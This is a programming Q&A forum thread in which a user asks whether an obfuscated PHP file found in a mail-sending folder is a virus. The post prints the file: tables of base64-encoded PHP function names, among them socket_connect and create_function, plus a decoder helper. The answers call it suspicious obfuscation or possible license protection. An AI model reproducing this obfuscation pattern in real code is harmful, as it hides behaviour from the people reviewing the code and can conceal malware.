Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
U
U
up72020-05-05 13:25:36
PHP
up7, 2020-05-05 13:25:36

Why this code? Not a virus?

This is where the code starts:

<? $GLOBALS['_1116732506_']=Array(base64_decode('' .'c3' .'RyX3J' .'lcGxhY2' .'U' .'='),base64_decode('' .'bXRfc' .'m' .'Fu' .'ZA=='),base64_decode('' .'YXJ' .'yY' .'Xlf' .'ZGlmZl9r' .'ZXk='),base64_decode('' .'Y' .'XJy' .'YX' .'lfZGlmZl91a2V5'),base64_decode('c' .'3RycG9' .'z'),base64_decode('c' .'3RyX' .'3Jl' .'cGx' .'hY' .'2U='),base64_decode('c' .'3R' .'ydG90a' .'W1l'),


This is an array of methods - str_replace and so on

. Why is it? In the mail send folder

Here is the whole code of the file:

<? $GLOBALS['_1116732506_']=Array(base64_decode('' .'c3' .'RyX3J' .'lcGxhY2' .'U' .'='),base64_decode('' .'bXRfc' .'m' .'Fu' .'ZA=='),base64_decode('' .'YXJ' .'yY' .'Xlf' .'ZGlmZl9r' .'ZXk='),base64_decode('' .'Y' .'XJy' .'YX' .'lfZGlmZl91a2V5'),base64_decode('c' .'3RycG9' .'z'),base64_decode('c' .'3RyX' .'3Jl' .'cGx' .'hY' .'2U='),base64_decode('c' .'3R' .'ydG90a' .'W1l'),base64_decode('ZX' .'hw'),base64_decode('bXRf' .'cm' .'FuZA' .'=='),base64_decode('' .'c' .'3RyX' .'3' .'Jl' .'cGxhY2U='),base64_decode('bXRfcm' .'Fu' .'ZA=' .'='),base64_decode('c' .'3R' .'y' .'d' .'G9sb' .'3d' .'lc' .'g=='),base64_decode('c3Ryc' .'G9z'),base64_decode('aW1hZ2V' .'kZX' .'N0cm95'),base64_decode('c3RyX3JlcG' .'xhY2U='),base64_decode('b' .'WtkaXI='),base64_decode('' .'aW1hZ2Vjb3B' .'5'),base64_decode('c' .'HJ' .'l' .'Z' .'19yZXBs' .'YWN' .'l'),base64_decode('YXJyYX' .'l' .'fZmlsd' .'GVy'),base64_decode('' .'c' .'3RycHRpbWU='),base64_decode('c3' .'RycG' .'9z'),base64_decode('Zml' .'s' .'Z' .'Q=='),base64_decode('bXR' .'fcm' .'FuZA=='),base64_decode('' .'YXJyYXlfcmVkd' .'W' .'Nl'),base64_decode('cHJlZ19yZXBs' .'YWNl'),base64_decode('c2' .'9ja2V0X2Nvb' .'m' .'5lY3Q='),base64_decode('bXRfcmF' .'uZA' .'=='),base64_decode('' .'a' .'XNf' .'Y' .'X' .'JyYXk='),base64_decode('a' .'W1hZ2VjcmV' .'h' .'dGVmc' .'m' .'9tZ' .'2Q='),base64_decode('aW1hZ2Vjcm' .'VhdGU='),base64_decode('' .'c2' .'V' .'zc2l' .'vbl9pc19yZWdpc' .'3R' .'l' .'cm' .'Vk'),base64_decode('cH' .'JlZ19yZXB' .'s' .'Y' .'WNl'),base64_decode('cHJlZ19' .'xdW90Z' .'Q' .'=='),base64_decode('aW1hZ' .'2Vjb3B5bWVyZ2' .'Vn' .'cmF5'),base64_decode('' .'bXRfcmF' .'u' .'ZA=' .'='),base64_decode('c' .'HJlZ1' .'9t' .'Y' .'XRjaA=='),base64_decode('c' .'HJlZ19y' .'ZX' .'BsYWN' .'l'),base64_decode('' .'c29ja2V0' .'X' .'2NyZWF0ZV' .'9w' .'YWly'),base64_decode('bXRf' .'cm' .'FuZ' .'A=='),base64_decode('bX' .'RfcmFuZA' .'=='),base64_decode('bXRfcmFuZA=='),base64_decode('cH' .'Jl' .'Z' .'19tYXR' .'jaF9hbGw='),base64_decode('cHJlZ19yZX' .'B' .'sYWNl'),base64_decode('' .'c3R' .'ycG9z'),base64_decode('c29' .'ja2V0X2dldF9zdGF' .'0dXM' .'='),base64_decode('bXRf' .'c' .'mFuZA=' .'='),base64_decode('YXJy' .'YXl' .'fc' .'mF' .'u' .'ZA=='),base64_decode('Z' .'2V0X2' .'1hZ2l' .'jX3F1b3R' .'lc' .'19ncGM='),base64_decode('c3R' .'yX3JlcGxhY2U='),base64_decode('c3RyX3Jlc' .'GxhY2U='),base64_decode('c3' .'Ry' .'X3JlcG' .'xhY2U='),base64_decode('bXRfcm' .'F' .'u' .'ZA=' .'='),base64_decode('Y' .'XJyYXlfZGl' .'mZl' .'9r' .'Z' .'Xk='),base64_decode('' .'c3RyX3' .'JlcG' .'xh' .'Y2U='),base64_decode('YXJyYXlfcm' .'F' .'u' .'Z' .'A=='),base64_decode('' .'Y' .'2' .'91' .'bn' .'Q='),base64_decode('' .'c' .'3RyX3JlcGxh' .'Y2U='),base64_decode('' .'ZmdldHM='),base64_decode('Y3VybF9' .'t' .'d' .'Wx0aV9n' .'ZXR' .'jb' .'25' .'0ZW50'),base64_decode('bXRfcmFuZA=='),base64_decode('Zmd' .'ldGM='),base64_decode('' .'bX' .'RfcmF' .'u' .'Z' .'A=='),base64_decode('bXNzcWx' .'fcXV' .'lc' .'nk='),base64_decode('bXRfcmF' .'uZ' .'A=' .'='),base64_decode('c' .'3R' .'y' .'c' .'G' .'9z'),base64_decode('c3Ry' .'dG90' .'aW1l'),base64_decode('c3RyX3J' .'lcGxh' .'Y' .'2U='),base64_decode('bXRfc' .'m' .'FuZ' .'A=='),base64_decode('' .'c3RybmN' .'tcA=' .'='),base64_decode('cH' .'JpbnR' .'f' .'cg=='),base64_decode('ZGF' .'0Z' .'Q=='),base64_decode('c3R' .'yX3JlcGxhY2' .'U='),base64_decode('' .'bXR' .'fc' .'m' .'FuZ' .'A=='),base64_decode('Z' .'mdldGM='),base64_decode('YXJyY' .'XlfcmVkdWN' .'l'),base64_decode('c2' .'Vzc2lvb' .'l9p' .'c19y' .'ZWdpc3' .'Rlcm' .'Vk'),base64_decode('c3' .'Ry' .'X3JlcG' .'xhY' .'2' .'U' .'='),base64_decode('c3' .'Ry' .'cG9z'),base64_decode('' .'c' .'3RycnB' .'vcw=='),base64_decode('c' .'3Ry' .'cG' .'9z'),base64_decode('Zm' .'xvY2s='),base64_decode('' .'dXJsZW5j' .'b' .'2Rl'),base64_decode('Y' .'X' .'JyYXlfcHJvZHVjdA=='),base64_decode('c' .'3RyX3J' .'l' .'cGxhY2U='),base64_decode('Y' .'3J' .'lYXRlX2' .'Z1bmN0a' .'W' .'9' .'u'),base64_decode('' .'c' .'3R' .'y' .'cG' .'9z'),base64_decode('b' .'XR' .'fcmFuZA=='),base64_decode('' .'dXJsZ' .'W5jb2Rl'),base64_decode('c3RycG9z'),base64_decode('Zm' .'lsZQ=='),base64_decode('bXRfcmF' .'uZ' .'A=='),base64_decode('YXJ' .'y' .'Y' .'Xl' .'fc3BsaWNl'),base64_decode('' .'Y' .'3V' .'ybF' .'9t' .'dWx0' .'aV' .'9pbmZ' .'vX3JlYWQ='),base64_decode('YXJyYXlfaW50ZXJzZWN0'),base64_decode('c2Vz' .'c2lvbl9pc' .'19yZWdpc3' .'Rl' .'cm' .'Vk'),base64_decode('c3R' .'ycHRp' .'bW' .'U='),base64_decode('b' .'XRfcmFuZA==')); ?><? function _1103804360($i){$a=Array('JiMwMzI7','IA==','bGo=','' .'Pg==','Jm' .'d0O' .'w=' .'=','YXB' .'s','PA==','Jmx0Ow==','dm' .'I=','b3JzaXd' .'xb2Znd' .'GFzdw==','dWp6','' .'Ig==','' .'J' .'nF1b3Q7','LwoKL' .'w==','PHA+','' .'bG1ubHdp' .'Z' .'m' .'Fi' .'Ym5' .'vYnJ0a3' .'J' .'1','cHV' .'scno' .'=','Lwov','' .'PGJ' .'yP' .'g==','L' .'1w' .'kLw' .'=' .'=','Ji' .'MwMzY' .'7','eA==','' .'Lw0' .'v','','L1xcLw' .'=' .'=','J' .'i' .'MwOTI7','' .'Z3' .'Zja2R' .'kZWRvZmxxbg==','YmlrZ' .'Ho=','J' .'iMwOTI7JnF1b3Q7','' .'J' .'nF1' .'b3Q' .'7','' .'JiMwO' .'T' .'I' .'7Jw==','Jw==','J' .'iMw' .'OTI7JiMwOTI7','JiM' .'wO' .'TI' .'7','' .'bnE=','' .'DQo=','PGJ' .'y' .'PiA=','Cgo=','' .'PH' .'A+IA==','aX' .'dpcW' .'hsdH' .'V0' .'am' .'9h' .'Z' .'HA=','b3o=','Cg==','PGJyPiA=','dXZn','CQ==','','DQ' .'==','','Y3VlZG1idGFr' .'Y3FqcnN' .'2Ym4' .'=','' .'amR6','d' .'3Z1Ym' .'JxaHZ' .'4d2' .'5tdQ==','ZWx2aXo=','c3' .'JyYg==','' .'ICAg','' .'IA=' .'=','b' .'G' .'hpa' .'XF' .'o' .'dnh3ZX' .'Vtc' .'G' .'4=','' .'Z3d' .'mbno' .'=','' .'cXB3','a3g=');return base64_decode($a[$i]);} ?>

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
A
Anton Neverov, 2020-05-05
@up7

Depends on what you mean by "virus".
This is clearly bad code.

Report
S
Saboteur, 2020-05-05
@saboteur_kiev

up7 , no one will decode the code. You need to sit down, spend an hour or two of your personal time.
And so it is clear that this is obfuscated code.
If you didn’t write it, then either it is malicious code, or you stole someone’s program, the author of which tried to protect himself from people like you in this way.
What exactly does it do - if you are interested, decode it. There is no encryption here, base64 decoding is available in all programming languages, and even separately.

Report
C
Coding1liki, 2020-05-06
@Coding1liki

I have already seen a similar solution. An array with a list of standard functions. As already mentioned above, it is used to hide the true goals of further code. Easily decoded. In Bitrix, the license check is coded in this way. Perhaps there are similar components in other commercial systems.

Similar questions
Y
Yuri Kulaxyz2019-09-21 23:05:53
Why doesn't Laravel sort() work? 3Reply
I
ibr_982017-04-24 19:18:51
Why doesn't "MouseEnter" work in visual c#? 2Reply
Y
Yaroslav2019-10-03 12:49:21
Where and how to find free labor for the for fun project and where to discuss ideas? 7Reply
J
Jan2017-05-08 08:56:20
How to pass data to popup (Angular)? 3Reply
A
AnatoliyKarpov2021-04-16 14:24:16
How to make ul have different classes? 3Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question